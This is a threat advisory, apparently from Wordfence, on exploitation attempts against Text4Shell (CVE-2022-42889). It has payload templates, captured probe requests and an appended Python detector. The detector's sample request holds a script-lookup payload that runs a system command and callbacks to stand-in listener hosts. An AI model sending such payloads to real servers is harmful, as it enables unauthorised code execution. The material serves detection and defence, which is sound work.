Threat Advisory: Monitoring CVE-2022-42889 “Text4Shell” Exploit Attempts

On October 17, 2022, the Wordfence Threat Intelligence team began monitoring for activity targeting CVE-2022-42889, or “Text4Shell” on our network of 4 million websites. We started seeing activity targeting this vulnerability on October 18, 2022.

Text4Shell is a vulnerability in the Apache Commons Text library versions 1.5 through 1.9 that can be used to achieve remote code execution. The library's StringSubstitutor interpolates ${prefix:value} lookups in the strings it processes, and the default interpolator in the affected versions included the dns, url and script lookups, so an application that passes untrusted input through it can be made to resolve an attacker-chosen hostname, fetch a URL or execute a script. While the vulnerability itself is similar to last year's CVE-2021-44228 in Apache's log4j library, the Apache Commons Text library is far less widely used in an unsafe manner, and the likelihood of successful exploitation is significantly lower.

As the vulnerability allows remote code execution, it has a CVSS score of 9.8, indicating critical impact if successfully exploited. The issue was patched in version 1.10.0, which removes the dns, url and script lookups from the default interpolator.

For more details on the data we have collected, continue reading below.

Most of the payloads we have observed and are tracking appear in query string parameters or headers and use one of the following formats:

DNS prefix:

${dns:address:<victimdomain>.<unique identifier>.<listenerdomain>}

Example request:
GET / HTTP/1.1
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: ${dns:address|}
Accept-Encoding: ${dns:address|}
Accept-Language: ${dns:address|}
Access-Control-Request-Headers: ${dns:address|}
Access-Control-Request-Method: ${dns:address|}
Authentication: Bearer ${dns:address|}
Cookie: %5Bredacted%5D=%5Bredacted%5D;
Location: ${dns:address|}
Origin: ${dns:address|}
Referer: ${dns:address|}
Upgrade-Insecure-Requests: ${dns:address|}
X-Api-Version: ${dns:address|}
X-Csrf-Token: ${dns:address|}
X-Druid-Comment: ${dns:address|}
X-Origin: ${dns:address|}
X-Vismaservice: VSP

Script prefix:

${script:javascript:<rce payload>}

Example request:
GET /? HTTP/1.1
Accept-Encoding: gzip
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

Url prefix:

${url:<charset>:<listener url>}
Example request:
GET /wp-json/wp/v2/comments? HTTP/1.1
Accept-Encoding: gzip
User-Agent: Fuzz Faster U Fool v1.5.0-dev
Host: <redacted>

The vast majority of requests we are seeing use the DNS prefix and are intended to scan for vulnerable installations: a successful attempt results in the victim site making a DNS query to the attacker-controlled listener domain, and the unique identifier embedded in the queried hostname tells the scanner which target resolved it.
The script prefix is less common and is the one used to achieve actual code execution. We have seen a variety of payloads, but all of them also appear to be intended to send a request back to a listener URL.
The url prefix is the least common one we have tracked and functions in the same way as the dns prefix: a successful attempt causes the victim site to fetch the attacker-controlled listener URL.
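As an added example, not code from the Wordfence post: a small Python checker that applies the three payload formats above to a raw HTTP request, percent-decoding the request target and every header value (as the encoded Cookie header above shows, probes are often URL-encoded), classifying dns and url lookups as scanning and script lookups as code execution, and pulling out the callback host a vulnerable site would contact so it can be recorded as an observable. The url argument shape it matches, ${url:<charset>:<url>}, comes from the Commons Text documentation rather than from the post; the sample request and its .example hostnames are constructed for illustration and are not observed traffic.

```python
import re
from urllib.parse import unquote, urlsplit

# Lookup prefixes resolved by the default StringSubstitutor interpolator in
# Commons Text 1.5-1.9 and seen in Text4Shell traffic. Argument shapes:
#   dns:address:<host>        -> victim resolves <host>              (scan)
#   url:<charset>:<url>       -> victim fetches <url>                (scan)
#   script:<engine>:<code>    -> victim runs <code> in a JSR-223 engine (rce)
LOOKUP_RE = re.compile(r"\$\{(dns|url|script):([^}]*)\}", re.IGNORECASE)


def percent_decode(value, max_rounds=3):
    """Percent-decode until stable; probes are often URL-encoded once or twice."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def callback_host(prefix, argument):
    """Host the victim would contact for dns/url lookups (None for script)."""
    _, _, rest = argument.partition(":")  # drop the "address" word or the charset
    if prefix == "dns":
        return rest.strip() or None
    if prefix == "url":
        return urlsplit(rest.strip()).hostname
    return None


def find_lookups(text):
    """Every ${dns|url|script:...} in text, with its category and callback host."""
    findings = []
    for match in LOOKUP_RE.finditer(percent_decode(text)):
        prefix, argument = match.group(1).lower(), match.group(2)
        findings.append({
            "prefix": prefix,
            "argument": argument,
            "category": "rce" if prefix == "script" else "scan",
            "callback_host": callback_host(prefix, argument),
        })
    return findings


def scan_request(raw_request):
    """Check the request target and each header value of a raw HTTP/1.x request."""
    head, _, _ = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else request_line
    results = [{"location": "request-target", **hit} for hit in find_lookups(target)]
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        results.extend({"location": name.strip(), **hit} for hit in find_lookups(value))
    return results


def summarize(raw_request):
    """Worst category across the request plus the sorted set of callback hosts."""
    hits = scan_request(raw_request)
    categories = {h["category"] for h in hits}
    worst = "rce" if "rce" in categories else ("scan" if categories else "clean")
    hosts = sorted({h["callback_host"] for h in hits if h["callback_host"]})
    return worst, hosts


# Constructed sample modelled on the header-spraying probes quoted above;
# hostnames use reserved .example names, not real listeners.
SAMPLE_REQUEST = (
    "GET /wp-json/wp/v2/comments?s=%24%7Bdns%3Aaddress%3Avictim.example.a1b2c3.oast.example%7D HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "User-Agent: Fuzz Faster U Fool v1.5.0-dev\r\n"
    "Accept: ${url:UTF-8:http://oast.example/ping}\r\n"
    "X-Api-Version: ${script:javascript:java.lang.Runtime.getRuntime().exec('id')}\r\n"
    "Cookie: session=abc\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for hit in scan_request(SAMPLE_REQUEST):
        print(f"{hit['location']:16} {hit['category']:4} {hit['prefix']:6} -> {hit['callback_host']}")
    print(summarize(SAMPLE_REQUEST))
```

The callback host for a dns probe is the full queried name, so the listener domain and the per-target identifier stay together; strip the leading victim labels yourself if you want to group by listener. Matching on the decoded text rather than the raw bytes is what catches the encoded variants, and keeping script separate from dns/url is what lets a triage queue treat an attempted execution differently from a scan.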

Cyber Observables

The following IP addresses have sent out requests targeting the vulnerability. IP addresses marked with * have targeted multiple sites:

We are seeing a number of listener hosts in use:

Most of these listeners are running Interactsh servers, which are frequently used by legitimate security teams to test for out-of-band interactions. It is possible, however, that at least some of these requests are being performed by bug bounty hunters or malicious actors.

New IP Addresses attacking CVE-2022-42889 will appear on the Wordfence Intelligence IP Threat Feed in the “rce” category as the feed is updated every 60 minutes.

The post Threat Advisory: Monitoring CVE-2022-42889 “Text4Shell” Exploit Attempts appeared first on Wordfence.
